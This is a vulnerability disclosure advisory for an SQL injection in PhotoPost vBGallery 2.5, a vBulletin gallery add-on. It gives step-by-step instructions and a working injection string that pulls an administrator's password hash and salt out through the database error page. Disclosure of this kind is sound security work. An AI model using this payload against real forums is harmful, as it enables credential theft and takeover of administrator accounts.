PhotoPost vBGallery 2.5 SQL Injection

`Product Imnformation  
--------------------  
PhotoPost vBGallery is a popular commercial Image Gallery Add-on für   
vBulletin which is being developed by All Enthusiasts, Inc.  
http://www.photopost.com  
  
Description  
-----------  
PhotoPost vBGallery 2.5 allows the user to modify gallery settings for   
his profile page if the function is enabeld and the user has permission   
to do so.  
  
For this function to work, PhotoPost vBGallery adds a Plug-in to hook   
profile_start.  
The PHP code on this plug-in is being used to display a form which does   
allow the user to customize the settings and save the settings into the   
database.  
  
The SQL constructed for action updatevbgallery does contain variables   
that are not properly sanitized:  
  
The POST variables profile_include and profile_exclude are treated as   
HTML-Safe strings ad unses with the SQL directly althou only   
commaseparated integers are valid.  
POST variable profile_showimg is also processed as a HTML-safe string   
altouth only integer values are valid.  
POST variable profile_column is also processed as a HTML-safe string but   
not being made SQL-safe.  
POST variable array profile_imagebitdisplay is being stored without   
being made SQL-safe  
  
Versions  
---------  
Affected Version(s): 2.5  
Not affected Versions: Versions prior to 2.5  
  
Exploit  
-------  
This exploit shows how the get the password hash and salt of an   
administrator account.  
  
Preconditions  
- No table prefix is being used  
- The gallery functions are enabled for member profiles  
- User-ID of an adminitrator account is 1  
- The vBulletin database error page is unmodified and shows the executed   
SQL as an HTML comment  
- The account being used has permissions to modify gallery profil settings  
  
1) Go to <forumroot>/profile.php?do=vbgalleryprofile  
2) Using Firebug, remove the maxlength attribute for the input labeled   
Exclude Catagories  
3) Enter  
', profile_exclude = (SELECT CONCAT(password, '|||', salt) FROM user   
WHERE userid = 1), profile_include = '  
into the imnput field Exclude Catagories  
4) Submit the form  
5) Access your own profile page (<forumroot>/member.php?u=X)  
5) The HTML source of the database error page will contain an HTML   
comment like  
---  
Invalid SQL:  
  
SELECT imageid, images.title, images.description, filename,   
thumbname, originalname, extension, images.catid ,images.userid,   
images.username, images.description, images.dateline, images.views,   
posts ,width, height, originalwidth, originalheight ,filesize,   
originalfilesize, images.lastpostdateline, images.lastpostuserid,   
images.lastpostusername, votenum, votetotal, categories.title AS cattitle  
FROM ppgal_images AS images  
LEFT JOIN ppgal_categories AS categories USING (catid)  
WHERE valid = 1 AND images.userid = 5  
  
  
AND images.catid NOT IN (abcdef12344777148822d7530f089fbd|||.%&/)  
AND images.thumbname != ''  
---  
The string after "AND images.catid NOT IN (" is the password hash and   
salt of user ID 1 separated by |||  
  
Suggested Fixes  
---------------  
Properly sanitize user input and run strings trough $db->escape_string()   
before saving them into the database  
  
Patches  
-------  
All Enthusiasts, Inc. was informed about this vulnerbilitie on   
2010/03/17 but has not yet released a patch.  
`